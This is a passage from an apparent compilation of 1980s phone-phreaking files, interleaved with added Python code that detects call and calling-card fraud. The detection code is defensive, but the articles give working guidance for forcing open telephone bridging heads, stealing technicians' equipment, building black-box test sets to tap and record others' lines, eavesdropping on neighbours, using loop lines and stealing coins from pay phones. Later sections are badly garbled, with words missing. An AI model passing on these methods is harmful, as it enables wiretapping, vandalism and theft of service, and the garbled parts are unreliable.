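1987-11-02T21:02:25|312-555-0141|800-555-0199|5
1987-11-02T21:03:00|312-555-0141|800-555-0199|6
1987-11-02T21:03:35|312-555-0141|800-555-0199|48
"""


@dataclass(frozen=True)
class Call:
    start: datetime
    origin: str
    dialed: str
    seconds: int


def parse_cdrs(text):
    """Parse the pipe-separated sample format into Call objects, oldest first."""
    calls = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = [f.strip() for f in line.split("|")]
        if len(fields) != 4:
            raise ValueError(f"line {lineno}: expected 4 fields, got {len(fields)}")
        start, origin, dialed, seconds = fields
        calls.append(Call(datetime.fromisoformat(start), origin, dialed, int(seconds)))
    return sorted(calls, key=lambda c: c.start)


def is_watched(dialed):
    """The two destination classes the text names: 800 service and directory assistance."""
    return dialed.startswith("800-") or dialed.endswith("555-1212")


def exceptional_calling_report(calls, window=timedelta(minutes=10), max_calls=5):
    """Return {origin: details} for lines exceeding max_calls watched calls per window.

    The window and limit are assumed values; the page does not say what
    thresholds a real report uses.
    """
    recent = defaultdict(deque)  # origin -> start times of watched calls still in the window
    report = {}
    for call in sorted(calls, key=lambda c: c.start):
        if not is_watched(call.dialed):
            continue
        times = recent[call.origin]
        times.append(call.start)
        # Drop calls that have aged out of the sliding window.
        while call.start - times[0] > window:
            times.popleft()
        if len(times) > max_calls:
            entry = report.setdefault(
                call.origin,
                {"first_flagged": call.start, "peak": 0, "dialed": set()},
            )
            entry["peak"] = max(entry["peak"], len(times))
            entry["dialed"].add(call.dialed)
    return report


if __name__ == "__main__":
    for origin, details in exceptional_calling_report(parse_cdrs(SAMPLE_CDRS)).items():
        print(origin, details["first_flagged"].isoformat(), details["peak"],
              sorted(details["dialed"]))
```

With the sample data, only the line that redials one 800 number every 35 seconds is reported; the line that calls an 800 number every half hour and the line with a single directory assistance call are not.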
The aforementioned facts show that ESS has made the jobs of organizations such
as the FBI, NSA, and other phone company security forces easier. Tracing can be
done in a matter of microseconds,
and the result will be conveniently printed out on the monitor of a phone
company officer. ESS is also programmed to pick up any "foreign tones" on the
phone line such as the many varied tones
emulated by boxes.
ESS can be identified by a few features common in it. The 911 emergency service
is covered in the later versions of ESS. Also, you are given the dial tone first
when using a pay phone unlike that of
SxS. Calling services like call forwarding, speed calling, and call waiting are
also common to ESS. One other feature common to ESS is ANI (Automatic Number
Identification) for long distance calls.
As you can see, ESS is basically the zenith of all switching systems, and it
will probably plague the entire country by the early 1990's. Soon after, we
should be looking forward to a system called
CLASS. This switching system will contain the feature of having the number of
the person that is calling you printed out on your phone.
What have I concluded about these switching systems? Well, they are not good
enough. I know a few people employed by the phone company, and I know for a fact
that they do not have enough
time these days to worry about code users, especially in large, metropolitan
areas. So, I will go out on a limb here, and say that a large portion of people
will never have to worry about the horrors of
ESS.
New Gizmo Can Change Voice Gender
The most amazing device has turned up in the new Hammacher Schlemmer catalog:
the telephone voice gender changer. What it does is change the pitch of your
voice from, say, soprano to bass -- a
most efficient way to dissuade an obscene phone caller just as he's getting
warmed up. That is not the same as running a 45 rpm record at 33. In digital
conversion, the pitch can be changed without
altering the speed.
The device runs on a 9-volt battery and attaches to the telephone mouthpiece
with a rubber coupler that takes but a moment to slip on and off. With the
changer switched on, says Lloyd Gray, a
Hammacher Schlemmer technical expert, "the effect is similar to what you hear
when they interview an anonymous woman on television and disguise her voice by
deepening it." "It's better for changing a
woman's voice to a man's than the other way around," Gray said. "A man can use it
to raise the pitch of his voice, but he still won't sound like a woman."
A man could, however, use the changer to disguise his voice. But with the device
set on high, Gray's voice still could be identified as his own. On low, his
normal tenor became so gravel like that the
words were unintelligible.
92. Remote Informer Issue #5 by Tracker, Norman Bates, and Ye Cap'n
AT&T Rates
WASHINGTON -- American Telephone & Telegraph Co. proposed Tuesday to lower its
interstate long-distance rates by an average of 3.6% to reflect reduced costs in
connecting to the local
telephone network. The largest decrease -- 6.3% -- would be seen in day time
prices "because of the need to make those rates more competitive," AT&T said.
Rates for calls made during evening hours would drop 2.2% and calls made during
the late night and weekends would be cut by 0.8%, the company said. The rate
reductions would take effect Jan. 1, if
they are approved by the Federal Communications Commission. Reacting to the
proposed price cuts, MCI Communications Corp. and US Sprint Communications Co.,
the nation's second-largest and
third-largest long distance companies respectively, said their response would
depend on what the FCC finally approves but both said they intended to remain
competitive with AT&T. AT&T, the
nation's largest long-distance company, proposed to the FCC that its rates drop
as much as $800 million, but AT&T said the exact amount will depend on the
access charges the FCC allows the local
telephone companies to collect from long distance carriers, which must pay the
fees to hook into the local phone network.
AT&T has challenged the new access rates filed by the regional Bell operating
companies, contending they are more than $1 billion too high. In proposing its
new rates, the long-distance leader told the
FCC it expects local companies' access fees to fall by at least $200 million --
which would amount to an average rate reduction of less than 1%. But the company
said it believes the FCC will order an
additional $600 million in reductions based on AT&T's challenge.
"We're confident the FCC will recognize that access charges filed by the local
telephone companies need to be substantially reduced, which would mean more
savings for our customers," said Larry
Garfinkel, AT&T vice president for marketing. He said the company filed its
proposed rates based on disputed charges because "we wanted to let the public
react ... and further to let the FCC have full
knowledge of where we were heading given our expectation that we had a valid
basis for our dispute."
AT&T's long-distance rates have fallen by about 34% since the company was
stripped of its local operating companies by an antitrust decree nearly four
years ago. Since then, phone rate payers have
been paying a larger share of the
costs of maintaining the local network through monthly subscriber line charges,
now $2.60 for residential customers. That has reduced the long-distance
companies' share of local network expenses, which they pay in the form of access
charges. Jack Grubman, a telephone analyst
with PaineWebber Inc., said AT&T's proposal targets business customers because
"that's where the competition is and where the better (profit) margins are." In
addition, it aims to keep the pressure
on competition in international calling by extending discounts to more
customers. Grubman added that, if the company's rate proposal is approved by the
FCC, he would expect no further cuts in
AT&T rates in 1988. Wendell Lind, AT&T administrator of rates and tariffs, said
the cuts for business and residential customers are about the same because
business cuts are offset by a proposed
$128 million increase in AT&T's private line rates.
AT&T is the only long-distance company whose rates are regulated by the FCC, but
its prices set the pace for the industry. Though AT&T is far larger than any of
its competitors, its market share has
been declining since divestiture and the company now says it serves about 75
percent of the market. In addition to the reductions in basic long-distance
rates, AT&T proposed cutting prices by 5% and
5.7% for its Pro-America calling plans. The company also proposed to reduce
prices by 2.9 percent for its 800 Service customers and 4.4 percent for WATS
customers, although it would increase the
monthly access line charges for those plans by $3.20 to reflect higher special
access charges filed by the local phone companies.
US Sprint Operator Service Traffic Increases 40%
ORLANDO, Fla. -- US Sprint Wednesday announced that its long distance operators, who
began saying, "May I help you?" just five months ago, are now handling 3½
million calls a month.
The fiber-optic long-distance carrier, offering the only operator service
alternative to AT&T, has experienced a 40 percent growth in operator service
calls since it announced its service July 1. Amanda
Weathersby, US Sprint vice president of product marketing, said Tuesday, "More
and more people are taking advantage of our call completion assistance and
alternative billing arrangements.
"Customer surcharges are the same as AT&T with the added benefit of US Sprint's
fiber-optic quality and lower long-distance rates." US Sprint currently offers
person-to-person, station-to-station,
call completion and collect calling. US Sprint has announced an agreement with
US WEST Service Link that will allow anyone to call on US Sprint and charge
their calls to a Regional Bell Operating
Co. calling card beginning in first quarter 1988.
"Previously, our operator service was available only on pre-subscribed US Sprint
phones and recently we added operator assistance for US Sprint FON CARD
customers," Weathersby said. "With
this new agreement, we'll be able to expand our operator service to markets such
as pay phones, hospitals, and hotels/motels." The newest 24-hour operator
service center in Dallas began operations
on Oct. 5. US Sprint's other operator service centers are in: Cherry Hill, NJ;
Atlanta; Lombard, IL and Reno, NV. US Sprint is a joint venture of United
Telecommunications Inc. of Kansas City, MO
and GTE Corp. of Stamford, Conn.
Pacific Bell Pursuing Calling Card Thief
SAN FRANCISCO--(BW)--Pacific Bell is warning consumers to protect their
telephone calling cards like any other credit card in the wake of a series of
frauds by people posing as phone company
employees. A Pacific Bell spokesman says customers in the 213, 805 and 916 area
codes are being victimized by someone who says he is a telephone company
employee investigating calling card
fraud. The individual calls people at home at odd hours, asking for their
calling card numbers. He then sells the numbers to people who use the numbers to
make long distance phone calls.
As recently as Monday of this week, 180 long distance calls were billed to a
Sacramento area resident who had given his number to the thief just three hours
earlier. According to Pacific Bell, this kind
of scheme and other forms of calling card fraud cost telephone customers
nationwide half a billion dollars a year. The company offered these tips to
consumers to avoid becoming a victim
of calling card fraud:
Never give your calling card number or personal identification number to anyone.
Any telephone company employee with a legitimate need to know the number has
access to it.
Treat your calling card like any other credit card. Report its loss immediately
by calling the 800 number on the back of the card 800-621-0430.
If you receive a suspicious call regarding your telephone calling card, report
it by calling the 800 number on the back of the card.
If you receive a call from someone claiming to be a telephone company employee
and asking for your calling card number, ask for a name and number to call back.
Then call the local Pacific Bell business office to report the incident.
One suspect was arrested in Southern California last week by a quick-thinking
customer who did just that. Pacific Bell immediately contacted the local police
department. A suspect holding seven stolen
calling card numbers was arrested minutes later. Pacific Bell and long-distance
telephone companies will credit customers for calling card charges determined to
be fraudulent. Pacific Bell is a subsidiary
of Pacific Telesis Group, a diversified telecommunications corporation based in
San Francisco.
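The Sacramento case above, 180 calls billed within three hours of the number being given out, is a pattern that shows up in call records. The following Python code is an added example, not part of the original article: it flags a card on call velocity and on overlapping calls placed from different originating numbers. The record layout, the thresholds and every sample value are assumptions constructed for illustration.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

BASE = datetime(1988, 1, 4, 2, 0)  # constructed start time for the sample data


def sample_records():
    """Constructed call detail records: (card, start, seconds, originating number)."""
    # CARD-A: ordinary use, three calls in a day from one home phone.
    recs = [("CARD-A", BASE + timedelta(hours=h), 600, "916-555-0101")
            for h in (6, 11, 17)]
    # CARD-B: 180 calls inside three hours, spread over six originating numbers.
    origins = ["213-555-01%02d" % n for n in range(6)]
    for i in range(180):
        recs.append(("CARD-B", BASE + timedelta(minutes=i), 300, origins[i % 6]))
    # CARD-C: low volume, but two calls in progress at once from different places.
    recs.append(("CARD-C", BASE, 900, "805-555-0110"))
    recs.append(("CARD-C", BASE + timedelta(minutes=5), 120, "213-555-0199"))
    return recs


def detect_card_abuse(records, window=timedelta(hours=3), max_calls=20):
    """Return {card: {rule: time the rule first fired}} for cards that look shared."""
    by_card = defaultdict(list)
    for card, start, seconds, origin in records:
        by_card[card].append((start, start + timedelta(seconds=seconds), origin))

    alerts = {}
    for card, calls in by_card.items():
        calls.sort()
        fired = {}
        recent = deque()   # start times still inside the sliding window
        in_progress = []   # (end, origin) of calls that have not finished yet
        for start, end, origin in calls:
            # Rule 1: more than max_calls call starts inside the window.
            recent.append(start)
            while start - recent[0] > window:
                recent.popleft()
            if len(recent) > max_calls:
                fired.setdefault("velocity", start)
            # Rule 2: a call starts while another call on the same card is
            # still in progress from a different originating number.
            in_progress = [(e, o) for e, o in in_progress if e > start]
            if any(o != origin for _, o in in_progress):
                fired.setdefault("concurrent-origins", start)
            in_progress.append((end, origin))
        if fired:
            alerts[card] = fired
    return alerts


if __name__ == "__main__":
    for card, fired in sorted(detect_card_abuse(sample_records()).items()):
        for rule, when in sorted(fired.items()):
            print(card, rule, "fired", when - BASE, "after the first call")
```

On the constructed data the concurrency rule fires on the second call, well before the volume threshold is reached.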
93. The Phreaker's Guide to Loop Lines by The Jolly Roger
A loop is a wondrous device which the telephone company created as test numbers
for telephone repairmen when testing equipment. By matching the tone of the
equipment with the tone of the loop,
repairmen can adjust and test the settings of their telephone equipment. A loop,
basically, consists of two different telephone numbers. Let's use A and B as an
example. Normally if you call A, you will
hear a loud tone (this is a 1004 hz tone), and if you call B, the line will
connect, and will be followed by silence.
This is the format of a loop line. Now, if somebody calls A and someone else
calls B--Voila!--A and B loop together, and one connection is made. Ma Bell did
this so repairmen can communicate with
each other without having to call their own repair office. They can also use
them to exchange programs, like for ANA or Ringback. Also, many CO's have a
"Loop Assignment Center". If anyone has
any information on these centers please tell me. Anyway, that is how a loop is
constructed. From this information, anyone can find an actual loop line. Going
back to the A and B example, note that the
tone side and the silent side can be either A or B. Don't be fooled if the phone
company decides to scramble them around to be cute. As you now know, loops come
in pairs of numbers, usually right
after each other.
For example: 817-972-1890
and
817-972-1891
Or, to save space, one loop line can be written as 817-972-1890/1. This is not
always true. Sometimes, the pattern is in the tens or hundreds, and,
occasionally, the numbers are random. In cities,
usually the phone company has set aside a phone number suffix that loops will be
used for. Many different prefixes will correspond with that one suffix. In
Arlington, Texas, a popular suffix for loops is
1893 and 1894, and a lot of prefixes match with them to make the number.
For Example: 817-460-1893/4
817-461-1893/4
817-465-1893/4
817-467-1893/4
817-469-1893/4
...are all loops...
or a shorter way to write this is:
817-xxx-1893/4
xxx= 460, 461, 465, 467, 469
Note: You can mix-and-match a popular suffix with other prefixes in a city, and
almost always find other loops or test numbers.
Note: For Houston, the loop suffixes are 1499 and 1799. And for Detroit it's
9996 and 9997. When there are a large number of loops with the same prefix
format, chances are that many loops will be
inter-locked. Using the above example of Arlington loops again, (I will write
the prefixes to save space) 460,
461, and 469 are interlocked loops. This means that only one side can be used at
a given time. This is because they are all on the same circuit. To clarify, if
817-461-1893 is called, 817-460 and 469-1893 cannot be called because that
circuit is being used. Essentially, interlocked
loops are all the same line, but there are a variety of telephone numbers to
access the line.
Also, if the operator is asked to break in on a busy loop line he/she will say
that the circuit is overloaded, or something along those lines. This is because
Ma Bell has taken the checking equipment off
the line. However, there are still many rarely used loops which can be verified
and can have emergency calls taken on them. As you have found out, loops come in
many types. Another type of loop is
a filtered loop. These are loop lines that the tel co has put a filter on, so
that normal human voices cannot be heard on either line. However, other
frequencies may be heard. It all depends on what the
tel co wants the loop to be used for. If a loop has gotten to be very popular
with the local population or used frequently for conferences, etc. the tel co
may filter the loop to stop the unwanted "traffic".
Usually, the filter will be removed after a few months, though.
94. How Ma Bell Works by The Jolly Roger
In this article, I will first describe the termination, wiring, and terminal
hardware most commonly used in the Bell system, and I will include a section on
methods of using them.
LOCAL NETWORK
The local telephone network between the central office/exchange and the
telephone subscribers can be briefly described as follows:
From the central office (or local exchange) of a certain prefix(es), underground
area trunks go to each area that has that prefix (Usually more than one prefix
per area.) At every few streets or tract
areas, the underground cables surface. They then go to the telephone pole (or
back underground, depending on the area) and then to the subscribers house (or
in the case of an apartment building or
multi-line business, to a splitter or distribution box/panel). Now that we have
the basics, I'll try and go in-depth on the subject.
UNDERGROUND CABLES
These are sometimes inter-office trunks, but usually in a residential area they
are trunk lines that go to bridging heads or distribution cases. The cables are
about 2-3 inches thick (varies), and are either
in a metal or pvc-type pipe (or
similar). Rarely (maybe not in some remote rural areas) are the cables just
'alone' in the ground. Instead they are usually in an underground cement tunnel
(resembles a small sewer or storm drain.) The
manholes are heavy and will say 'Bell system' on them. They can be opened with a
½ inch wide crowbar (Hookside) inserted in the top rectangular hole. There are
ladder rungs to help you climb down.
You will see the cable pipes on the wall, with the blue and white striped one
being the inter-office trunk (at least in my area). The others are local lines,
and are usually marked or color coded. There is
almost always a posted color code chart on the wall, not to mention Telco
manuals describing the cables and terminals, so I need not get into detail.
Also, there is usually some kind of test equipment,
and often Bell test sets are left in there.
BRIDGING HEADS
The innocent-looking grayish-green boxes. These can be either trunk bridges or
bridging for residences. The major trunk bridging heads are usually larger, and
they have the 'Western Electric' logo at
the bottom, whereas the normal bridging heads (which may be different in some
areas-depending on the company you are served by. GTE B.H.'s look slightly
different. Also, do not be fooled by
sprinkler boxes!) They can be found in just about every city. To open a bridging
head: if it is locked (and you're feeling destructive), put a hammer or crowbar
(the same one you used on the manhole)
in the slot above the top hinge of the right door. Pull hard, and the door will
rip off. Very effective! If it isn't locked (as usual), take a 7/8 inch hex
socket and with it, turn the bolt about 1/8 of a turn to
the right (you should hear a spring release inside). Holding the bolt, turn the
handle all the way to the left and pull out. To Check for a test-set (which are
often left by Bell employees), go inside - First
check for a test-set (which are often left by Bell employees). There should be a
panel of terminals and wires. Push the panel back about an inch or so, and
rotate the top latch (round with a flat
section) downward. Release the panel and it will fall all the way forward. There
is usually a large amount of wire and extra terminals. The test-sets are often
hidden here, so don't overlook it (Manuals,
as well, are sometimes placed in the head). On the right door is a metal box of
alligator clips. Take a few (Compliments of Bell.). On each door is a useful
little round metal device. (Says 'insert gently'
or 'clamp gently - do not overtighten' etc..) On the front of the disc, you
should find two terminals. These are for your test set. (If you don't have one,
dont despair - I'll show you ways to make basic
test sets later in this article). Hook the ring (-) wire to the 'r' terminal;
and the tip (+) wire to the other. (By the way, an easy way to determine the
correct polarity is with a 1½v LED. Tap it to the term.
pair, if it doesn't light, switch the poles until it does. When it lights, find
the longer of the two LED poles: This one will be on the tip wire (+). Behind
the disc is a coiled up cord. This should have two
alligator clips on it.. Its very useful, because you don't have to keep
connecting and disconnecting the fone (test set) itself, and the clips work
nicely. On the terminal board, there should be about 10
screw terminals per side. Follow the wires, and you can see which cable pairs
are active. Hook the clips to the terminal pair, and you're set! Dial out if you
want, or just listen (If someone's on the line).
Later, I'll show you a way to set up a true 'tap' that will let the person dial
out on his line and receive calls as normal, and you can listen in the whole
time. More about this later... On major prefix-area
bridging heads, you can see 'local loops', which are two cable pairs (cable pair
= ring+tip, a fone line) that are directly connected to each other on the
terminal board. These 'cheap loops' as they are
called, do not work nearly as well as the existing ones set up in the switching
hardware at the exchange office. (Try scanning your prefixes '00xx to 99xx #'s.)
The tone sides will announce themselves
with the 1008 hz loop tone, and the hang side will give no response. The first
person should dial the 'hang' side, and the other person dial the tone side, and
the tone should stop if you have got the
right loop.) If you want to find the number of the line that you're on, you can
either try to decipher the 'bridging log' (or whatever), which is on the left
door. If that doesn't work, you can use the
following:
ANI # (Automatic Number ID)
This is a Telco test number that reports to you the number that you're calling
from (It's the same, choppy 'Bell bitch' voice that you get when you reach a
disconnected number)
For the:
213 NPA - Dial 1223
408 NPA - Dial 760
914 NPA - Dial 990
These are extremely useful when messing with any kind of line terminals, house
boxes, etc. Now that we have bridging heads wired, we can go on... (don't forget
to close and latch the box after all...
Wouldn't want GE and Telco people mad, now, would we?)
"CANS" - Telephone Distribution Boxes
Basically, two types:
1. Large, rectangular silver box at the end of each street.
2. Black, round, or rectangular thing at every telephone pole.
Type 1 - This is the case that takes the underground cable from the bridge and
runs it to the telephone pole cable (The lowest, largest one on the telephone
pole.) The box is always on the pole nearest
the bridging head, where the line comes up. Look for the 'Call before you Dig -
Underground cable' stickers.. The case box is hinged, so if you want to climb
the pole, you can open it with no
problems. These usually have 2 rows of terminal sets. You could try to
impersonate a Telco technician and report the number as 'new active' (giving a
fake name and fake report, etc.) I don't
recommend this, and it probably won't (almost positively won't) work, but this
is basically what Telco linemen do.)
Type 2 - This is the splitter box for the group of houses around the pole
(Usually 4 or 5 houses). Use it like I mentioned before. The terminals (8 or so)
will be in 2 horizontal rows of sets. The extra
wires that are just 'hanging there' are provisions for extra lines to residences
(1 extra line per house, that's why the insane charge for line #3!) If its the
box for your house also, have fun and swap lines
with your neighbor! 'Piggyback' them and wreak havoc on the neighborhood (It's
eavesdropping time...) Again, I don't recommend this, and its difficult to do it
correctly. Moving right along...
APARTMENT / BUSINESS MULTI-LINE DISTRIBUTION BOXES
Found outside the building (most often on the right side, but not always... Just
follow the wire from the telephone pole) or in the basement. It has a terminal
for all the lines in the building. Use it just like
any other termination box as before. Usually says 'Bell system' or similar. Has
up to 20 terminals on it (usually.) the middle ones are grounds (forget these).
The wires come from the cable to one row
(usually the left one), with the other row of terminals for the other row of
terminals for the building fone wire pairs. The ring (-) wire is usually the top
terminal if the set in the row (1 of 10 or more), and
the tip is
in the clamp/screw below it. This can be reversed, but the cable pair is always
terminated one-on-top-of-each- other, not on the one next to it. (I'm not sure
why the other one is there, probably as a
provision for extra lines) Don't use it though, it is usually to close to the
other terminals, and in my experiences you get a noisy connection.
Final note: Almost every apartment, business, hotel, or anywhere there is more
than 2 lines this termination lines this termination method is used. If you can
master this type, you can be in control of
many things... Look around in your area for a building that uses this type, and
practice hooking up to the line, etc. As an added help, here is the basic
'standard' color-code for multi-line
terminals/wiring/etc...
Single line: Red = Ring
Green = Tip
Yellow = Ground *
*Connected to the ringer coil in individual and bridged ringer phones (Bell
only) Usually connected to the green (Tip)
Ring (-) = Red
White/Red Stripe
Brown
White/Orange Stripe
Black/Yellow Stripe
Tip (+) = Green (Sometimes yellow, see above.)
White/Green Stripe
White/Blue Stripe
Blue
Black/White Stripe
Ground = Black
Yellow
RESIDENCE TERMINAL BOX
Small, gray (can be either a rubber (Pacific Telephone) or hard plastic (AT&T)
housing deal that connects the cable pair from the splitter box (See type 2,
above) on the pole to your house wiring.
Only 2 (or 4, the 2 top terminals are hooked in parallel with the same line)
terminals, and is very easy to use. This can be used to add more lines to your
house or add an external line outside the house.
TEST SETS
Well, now you can consider yourself a minor expert on the terminals and wiring
of the local telephone network. Now you can apply it to whatever you want to
do.. Here's another helpful item:
How to make a Basic Test-Set and how to use it to dial out, eavesdrop, or
seriously tap and record line activity. These are the (usually) orange hand set
fones used by Telco technicians to test lines. To
make a very simple one, take any Bell (or other, but I recommend a good Bell
fone like a princess or a trimline. GTE flip fones work excellently, though..)
fone and follow the instructions below.
Note: A 'black box' type fone mod will let you tap into their line, and with the
box o, it's as if you weren't there. They can receive calls and dial out, and
you can be listening the whole time! Very useful.
With the box off, you have a normal fone test set.
Instructions:
A basic black box works well with good results. Take the cover off the fone to
expose the network box (Bell type fones only). The <RR> terminal should have a
green wire going to it (orange or
different if touch tone - doesn't matter, its the same thing). Disconnect the
wire and connect it to one pole of an SPST switch. Connect a piece of wire to
the other pole of the switch and connect it to
the <RR> terminal. Now take a 10kohm ½ watt 10% resistor and put it between the
<RR> terminal ad the <F> terminal, which should have a blue and a white wire
going to it (different for touch
tone). It should look like this:
-----Blue wire----------<F>
!
----White wire-----!
!
10k Resistor
!
!
--Green wire-- !----<RR>
! !
SPST
What this does in effect is keep the hookswitch / dial pulse switch (F to RR
loop) open while holding the line high with the resistor. This gives the same
voltage effect as if the fone was 'on-hook', while
the 10k ohms holds the voltage right above the 'off hook' threshold (around 22
volts or so, as compared to 15-17 or normal off hook 48 volts for normal
'on-hook'), giving Test Set Version 2.
Another design is similar to the 'Type 1' test set (above), but has some added
features:
From >----------------Tip------<To Test
Alligator set
Clip >----------------Ring-----<phone
!
x
o x---RRRRR---!
!---x
x----0------! Switch LOD 0 = Green LED
RRRRR= 1.8k ½ watt xxxx= Dpst
resistor
When the SPST in on, will light, and fone become active. green light should be
on. If it isn't, dpst. still check polarity of line LEDs. With both lights hang
up fone. They all off now. Now flip dpst pick
red but shouldn't. is, something is wrong circuit. You wont get a dial tone
correct. hook to alligator clips (Assuming have put this circuit inside our on
ring tip wires (As we did before)) #1 position.
greatly reduce static noise involved hooking line. can also used correct
polarity. ability listen audible activity, people (the 'eavesdroppers use their
as normal. Note that test sets #2 true 'black boxes for
free calls (see an article about boxes). Set Version 3
Using trimline (or similar) phone, remove base cut wire leads except (ring -)
(tip +). Solder lug. itself 'tinsel' wrapped rayon, doesn't well. one handset,
socket (if has one) install small slide or toggle
(Radio Shack's micro-miniature works well). Locate connection PC board near
where jack located at bottom handset. are sometimes brow instead green,
respectively). foil run 2 pieces your switch.
parallel add ¼ uf 200 VDC capacitor (mylar, silvered mica, ceramic, not
electrolytic). closed, handset functions normally. other position, without being
heard.
Note: connecting line, selectable 1000 ohm series wire. connecting, once again.
just disconnect' type (above)). avoid touching any metal parts terminals, I
causes raises suspicions.
RECORDING would like record 1 above (for unattended activity), going there
monitor dialing, talking, etc. Place telephone pickup coil (I recommend Becoton
T-5 TP equivalent) onto set, plug into
mic. standard tape recorder. Hit play, rec, pause. Alternate pause want don
think anyone difficulty all...) Well, make parts, hope. methods:
1. Find bell manhole bridging head 'Borrow indefinitely'...
2. purchased from:
Techni-Tool
5 Apollo Road
Box 368
Plymouth Meeting PA., 19462
Ask catalog #28 usually $300 - $600, supposed M-F dialing capability well TT
dialing. much higher quality than sets. learn more subjects covered here,
suggest: Follow trucks linemen
technicians subtle questions. try 611 (repair service) questions.. Explore area
hardware, experiment it. sure what're doing, because wouldn cause problems, you?
95. Getting Money out Pay Phones by Jolly Roger share my experiences telephones.
discover possible from phone minimum effort. Theory: Most four transmission data
codes central
office. Two them voice (usually green), ground, last others codes. working with.
to, was colored purple, likely another color. do simply which exposed wires,
such disconnected connected ease fear
discovery. good idea some electrical along tool cutting tape. Through trial
error, time starting different red. during operation. supplying company so 'busy
'hang-up' command. Leave happen: Anytime
someone puts amount deposit register held 'temporary' chamber phone. Then, (a
day later so) come back reconnect wire, click few times dump chute. (What
happening' code receiving due suddenly
gets
dumps its' storage spot.) nice way, remember repairman stop every reported
broken repair it, least day. Enjoy fun.. Many done each..
96. Computer Based PBX better understanding do, here basic fundamentals. modern
combined computer, mass device, course switching system can: Produce itemized,
automated billing
procedures, allow identification management toll calls. [hahaha] Combine daytime
grade communication circuits wideband channels night high speed transfers.
3. Handles electronic mail [including office memos].
4. audio/visual conference circuit, xfer capture slides, flipcharts, pictures
kind. external internal calling capacity must carefully considered business
operations very ratio station low handle requested
traffic load. critical factor number trunks facilities outside connections.
junctions [links] paths. understand services available typical necessary
introduce subject division switching. network connections
made via single common bus called (of course) 'time-division trunk requires
provided port access [when ports require connection, switches operate frequency
(16,000 per second.) technique, 'speech
sampling', allows simultaneous over same bus. Each assigned interval, slot slots
identifies among ports.] next item packs. elements describing future tutorials
[lines/switches, memory control] contained
pack contains lines, example, four. assignment numbers actual flexible. packs
provide call processing functions. frames 'carriers'. Within carrier, plugged
positions: addressed by, say five digit tells
location carrier-slot-circuit.... [starting idea?] three types system:
· control contain lines. AT&T "dimension" model, total 52 64 lines provided. 16
carrier includes processor, memory, circuitry, attendant console measurement
outputs. systems directly reflect offered
c.o. ccsa ccis picturephones [sooner phriends] arrangements (ccsa) permit
unrestricted seven number. routing feature service inter-facility, routed paths
accomplished level, level. interest large scale
users channel interoffice signaling ccis. Typically, technique employs carry
inter-facility instructions: pulses, (idle), (busy),and between centers.
[getting warm]. replaces older methods band' techniques.
real phreaks selling idiots who worth lot...the former (in band) transmits
normal conversation bandwidth. It's shortcoming false information may
transmitted unique combinations talking path. [this
official reasoning]. techniques placed special channels, generally adjacent
immediately preserve interchannel integrity, efficient filtering greater guard'
separation channels.
97. PC-Pursuit Statistics
Introduction: 30 days been extremely controversial. ex-users demanded accurate
statistics, Telenet us little. questionable. guaranteed scream. wish update own,
tell how text. following chart consists
direct addresses city nodes modems node. means:
NJNEW/3 2011 .12 56 \-- \- Suffix Address sequence. Prefix. \--- Baud Rate 300.
\--------- Mnemonic.
Please several perfectly legal ways connect C D/3,PCP10000,><password> [HUNT]
2. C 2011,PCP10000,<password> [HUNT]
3. C 2011.10,PCP10000,<password> [NON HUNT]
The first is self-explanatory. The second does the same thing as the first,
except that it is slightly faster and gives the user much greater flexibility.
The third is an example of that flexibility, because a request
is made to connect to the tenth, and only the tenth, modem on the NJNEW/3 port.
By simply attempting to connect to every single modem in the 2011 chain, we were
able to count the number of
modems on each port and come up with the following charts, which were extracted
on June the twenty-ninth of the year 1989:
Rotary Port Direct Address Max. Range City Total Rotary Port Direct Address Max. Range City Total
NJNEW/3 2011 .12 56 CAOAK/3 4155 .4 16
/12 201301 .4 /12 415216 .8
/24 20122 .4 /24 41511 .4
DCWAS/3 202115 .6 46 CAPAL/3 415106 .4 12
/12 202116 .24 /12 415224 .8
/24 202117 .16 /24 NONE NONE
CTHAR/3 NONE NONE 8 CASFA/3 415215 .6 20
/12 203120 .8 /12 415217 .10
/24 NONE NONE /24 41523 .4
WASEA/3 20617 .4 30 ORPOR/3 50320 .2 8
/12 20619 .22 /12 50321 .6
/24 20621 .4 /24 NONE NONE
NYNYO/3 212315 .4 22 AZPHO/3 60222 .4 20
/12 212316 .14 /12 60223 .12
/24 21228 .4 /24 60226 .4
CALAN/3 213412 .8 40 MNMIN/3 612120 .4 22
/12 213413 .28 /12 612121 .14
/24 21323 .4 /24 61222 .4
TXDAL/3 214117 .6 30 MABOS/3 617311 .4 32
/12 214118 .22 /12 617313 .20
/24 21422 .4 /24 61726 .8
PAPHI/3 215112 .6 36 TXHOU/3 713113 .8 42
/12 2155 .22 /12 713114 .24
/24 21522 .8 /24 71324 .1
OHCLE/3 21620 .4 26 CACOL/3 71423 .4 18
/12 21621 .18 /12 7144 .1
/24 216120 .4 /24 71424 .4
CODEN/3 303114 .4 40 CASAN/3 714119 .4 20
/12 303115 .18 /12 714213 .12
/24 30321 .22 /24 714124 .4
FLMIA/3 305120 .6 28 CASDI/3 714102 .4 22
/12 305121 .18 (619)/12 714210 .14
/24 305122 .4 /24 714121 .4
ILCHI/3 312410 .8 40 UTSLC/3 80120 .4 22
/12 312411 .28 /12 80121 .14
/24 31224 .4 /24 80112 .4
MIDET/3 313214 .6 30 FLTAM/3 81320 .4 18
/12 313216 .18 /12 81321 .1
/24 31324 .6 /24 813124 .4
MOSLO/3 3145 .4 16 MOKCI/3 816104 .4 20
/12 314421 .8 /12 816221 .12
/24 31420 .4 /24 816113 .4
GAATL/3 404113 .8 32 CAGLE/3 NONE NONE ??
/12 404114 .20 /12 81821 .18
/24 40422 .4 /24 NONE NONE
CASJO/3 408111 .4 34 CASAC/3 9167 .4 16
/12 40821 .26 /12 91611 .8
/24 408110 .4 /24 91612 .4
WIMIL/3 41420 .4 24 NCRTP/3 91920 .4 20
/12 41421 .16 /12 91921 .12
/24 414120 .4 /24 919124 .4
NOTE: CASAC/3, CASAC/24 were estimated.
PC-Pursuit Modems Statistics Chart
Number of Modems - 01/29/89
Mnemonic 300 1200 2400 Total
NJNEW 12 40 4 56
DCWAS 6 24 16 46
CTHAR 0 8 0 8
WASEA 4 22 4 30
NYNYO 4 14 4 22
CALAN 8 28 4 40
TXDAL 6 22 4 32
PAPHI 6 22 8 36
OHCLE 4 18 4 26
CODEN 4 18 22 44
FLMIA 6 18 4 28
ILCHI 8 28 4 40
MIDET 6 18 6 30
MOSLO 4 8 4 16
